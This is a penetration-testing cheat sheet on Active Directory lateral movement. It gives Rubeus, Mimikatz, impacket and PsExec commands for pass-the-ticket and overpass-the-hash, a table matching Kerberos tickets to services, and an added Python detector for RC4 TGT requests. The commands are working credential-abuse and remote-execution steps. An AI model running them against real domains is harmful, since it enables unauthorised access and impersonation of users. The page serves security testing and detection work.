# Lateral Movement

## Introduction

In this section you will find several techniques for performing lateral movement on **Active Directory** infrastructure.

## Pass The Ticket (PTT)

In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication.

You can perform this technique with **Rubeus**.

```bash
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
```

Depending on the obtained TGS, you will only be able to perform specific tasks.

### Tickets - Techniques

| Service Type                               | Required Tickets                                   |
| ------------------------------------------ | -------------------------------------------------- |
| Windows File Share (PsExec)                | CIFS                                               |
| LDAP Operations (DCSync)                   | LDAP                                               |
| WinRM                                      | HOST, HTTP, WINRM                                  |
| WMI                                        | HOST, RPCSS                                        |
| PowerShell Remoting                        | HOST, HTTP, and depending on the OS: WSMAN, RPCSS  |
| Scheduled Tasks                            | HOST                                               |
| Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS                                  |
| Golden Tickets                             | krbtgt                                             |

## Overpass The Hash (OTH)

This technique allows a user to request a Kerberos TGT using the account's NTLM hash or its AES/RC4 Kerberos key instead of the password.

* **Alternative 1 - Without HIGH privileges**

```bash
# Alternative 1
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt
# Alternative 2
impacket-getTGT <DOMAIN>/<USERNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
```

* **Alternative 2 - Requires HIGH privileges**

```bash
[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"
```

Then you can use PsExec to access the machine, provided the impersonated user has administrator privileges on it.

> :information_source: The `-s` argument upgrades the session to "nt authority\system", but it only works if you connect as a highly privileged user.

```bash
# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]
```
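The defensive counterpart, as an added example that is not part of the original page: an Overpass-the-Hash request made with an NTLM hash (the `/ntlm:` option above) negotiates RC4-HMAC, so the domain controller logs the TGT request (Event ID 4768) with Ticket Encryption Type 0x17, while Windows clients in an AES-enabled domain normally request 0x11/0x12. The Python below parses constructed 4768 records in an assumed flattened `key=value` format (not real telemetry) and flags successful RC4 TGT requests for accounts that otherwise use AES.

```python
"""Flag Kerberos TGT requests (Event ID 4768) issued with RC4 (0x17)
for accounts that normally obtain AES (0x11/0x12) tickets."""
import re
from collections import defaultdict

RC4 = 0x17
AES = {0x11, 0x12}

# Constructed sample records in an assumed flattened key=value format;
# the field names match the 4768 event schema, the values are made up.
EVENTS = [
    "EventID=4768 TargetUserName=alice TargetDomainName=CORP IpAddress=10.0.0.21 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=alice TargetDomainName=CORP IpAddress=10.0.0.21 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=alice TargetDomainName=CORP IpAddress=10.0.0.99 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=svc_legacy TargetDomainName=CORP IpAddress=10.0.0.40 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4769 TargetUserName=alice TargetDomainName=CORP IpAddress=10.0.0.21 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=bob TargetDomainName=CORP IpAddress=10.0.0.31 TicketEncryptionType=0x17 Status=0x6",
]

FIELD = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Turn one flattened record into a dict of its fields."""
    return dict(FIELD.findall(line))


def find_rc4_tgt_requests(lines):
    """Return (alerts, rc4_only_accounts).

    alerts: (user, source IP) of successful RC4 TGT requests by accounts
            that have also received AES tickets, i.e. RC4 is abnormal for them.
    rc4_only_accounts: accounts that only ever request RC4 (typically legacy
            service accounts); these need a separate policy decision rather
            than an automatic alert.
    """
    etypes = defaultdict(set)
    rc4_requests = []
    for rec in map(parse, lines):
        # Only successful TGT issuance (4768, Status 0x0) is baselined.
        if rec.get("EventID") != "4768" or rec.get("Status") != "0x0":
            continue
        etype = int(rec["TicketEncryptionType"], 16)
        user = rec["TargetUserName"]
        etypes[user].add(etype)
        if etype == RC4:
            rc4_requests.append((user, rec["IpAddress"]))
    alerts = [(u, ip) for u, ip in rc4_requests if etypes[u] & AES]
    rc4_only = sorted(u for u, seen in etypes.items() if seen == {RC4})
    return alerts, rc4_only
```

On the constructed sample only alice's request from 10.0.0.99 is alerted; svc_legacy lands in the review list and bob's failed request (Status 0x6) is ignored.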

## S4U2Self Abuse (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](/active-directory/kerberos.md#s4u2self-abuse).

## Alternate Service Name (Constrained Delegation)

The exploitation is seen on the [Kerberos exploitation phase](/active-directory/kerberos.md#alternate-service-name).

## References

* [Attacking Kerberos: Constrained Delegation](https://www.notsoshant.io/blog/attacking-kerberos-constrained-delegation/)

